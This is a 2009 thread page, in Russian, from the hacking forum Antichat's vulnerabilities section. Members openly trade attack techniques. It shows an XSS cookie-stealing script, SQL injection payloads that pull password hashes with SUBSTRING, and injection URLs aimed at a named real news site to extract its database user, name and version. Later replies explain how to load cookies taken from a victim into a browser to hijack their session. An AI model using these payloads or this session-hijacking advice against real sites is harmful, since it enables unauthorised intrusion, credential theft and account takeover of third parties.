ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5891  
Старый 11.03.2009, 10:20
Аватар для Seshh
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
Question

Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>

то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???
 
Ответить с цитированием

  #5892  
Старый 11.03.2009, 10:42
Аватар для TreV@N
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию

Да.Такие-же действия.
 
Ответить с цитированием

  #5893  
Старый 11.03.2009, 12:18
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Gorev
Не вполне понял вопрос.

Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):

1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)

========================

Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера

http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User( ),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё

========================

Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает
 
Ответить с цитированием

  #5894  
Старый 11.03.2009, 14:41
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Цитата:
Сообщение от попугай  
token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd10 4ebc700
Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.
 
Ответить с цитированием

  #5895  
Старый 11.03.2009, 15:15
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Велемир  
Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.

а ты в phpmyadminе залогинен?
 
Ответить с цитированием

  #5896  
Старый 11.03.2009, 16:07
Аватар для joomler
joomler
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669

Репутация: 10
По умолчанию

Привет всем Ребят подскажите вот что:
Есть купи с другого компа, как их использовать?
 
Ответить с цитированием

  #5897  
Старый 11.03.2009, 16:12
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

В браузере вставляешь вместо своих куков на даном сайте и заходиш на него с сесией того, у кого ты их умыкнул...
 
Ответить с цитированием

  #5898  
Старый 11.03.2009, 16:52
Аватар для joomler
joomler
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669

Репутация: 10
По умолчанию

а куда их вставлять? в строку броузера?
 
Ответить с цитированием

  #5899  
Старый 11.03.2009, 16:57
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

не встроку а в место где куки опера -->tools-->preferences-->advanced-->coockies-->manage coockies
 
Ответить с цитированием

  #5900  
Старый 11.03.2009, 16:57
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Неет!
В опере:
Инструменты->настройки->дополнительно->cookie->управление cookie
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ